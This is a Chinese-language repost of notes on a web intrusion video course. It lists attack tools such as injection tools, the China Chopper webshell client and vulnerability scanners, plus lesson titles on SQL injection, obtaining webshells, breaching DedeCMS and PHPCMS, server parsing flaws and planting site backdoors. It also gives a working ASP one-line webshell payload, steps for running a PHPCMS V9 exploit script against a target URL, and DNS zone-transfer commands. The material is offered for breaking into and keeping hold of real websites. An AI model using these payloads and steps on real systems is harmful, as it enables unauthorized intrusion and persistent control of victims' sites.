简单工具:明小子,阿d注入工具,namp,穿山甲,御剑,旁注
漏洞扫描工具:appscan 、awvs、nbsi
端口扫描工具:nessus、namp、天镜脆弱性扫描与管理系统
数据库备份工具:中国菜刀
www.cmd5.com md5解码网站
突破防注入工具:cookie注入中转
web安全攻防视频目录:
2.思路、3.简单的工具使用、5.谷歌黑客语法、6.robots.txt、7.渗透必会端口、8.必会dos命令、9.http协议、11.漏洞扫描工具appscan 、
12.漏洞扫描工具awvs、13.14.15ewebitor、16.端口扫描和系统脆弱性评估、17.手工注入联合查询、
18.数据库备份拿webshell:如果不允许上次asp文件,可以改为aspx和cer的文件等
19.一句话木马拿webshell:如果不允许数据库备份,可以通过这种方式。”%><%execute(request(“mima”))%><%’
20.一句话后门:拿到shell后,将文档上面那部分代码复制进一个页面,然后安装步骤访问。
21.目录浏览漏洞利用、22.突破防注入系统(上)拿webshell、23.突破防注入系统(下)拿webshell
24.修改元素拿webshell、25.友情检测移动万能密码入侵、26.偏移注入(上)
28.手工入侵实战ACCESS数据库、29.搜索型注入方法、30.IIS6.0解析+高校管理系统漏洞利用
31.暴库利用:Conn.asp暴库、32.cmseasy上传漏洞利用、
33.入侵织梦、关键字:powered by DedeCMSV57_GBK 利用那个工具
34.入侵织梦注入 plus search 注入
35.PHPCMSV9任意读取漏洞、
1.ping 网址、2.打开1.bat、3.输入php9、4.输入php9 madman.in、5.输入php9 网址、6.使用navicat 8 连接数据库
36.APACHE解析漏洞利用:1.安装php-5.3.22-nts-Win32-VC9-x86、2.命令行运行php phpcmsv9.php、3.命令行运行php phpcmsv9.php 网址、4.使用菜刀shell出来的网址,地址后面写In 默认类型选php、5.然后上次木马
37.入侵骑士人才系统3:有文档
38.V5shop弱智漏洞、
39.DNS域传送信息泄露:有文档:命令行:nslookup、set type=ns、网址、server dns.网址、ls -d 网址
40.给站留后门
原文链接:https://www.cnblogs.com/hanxuming/p/7774617.html
原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/18017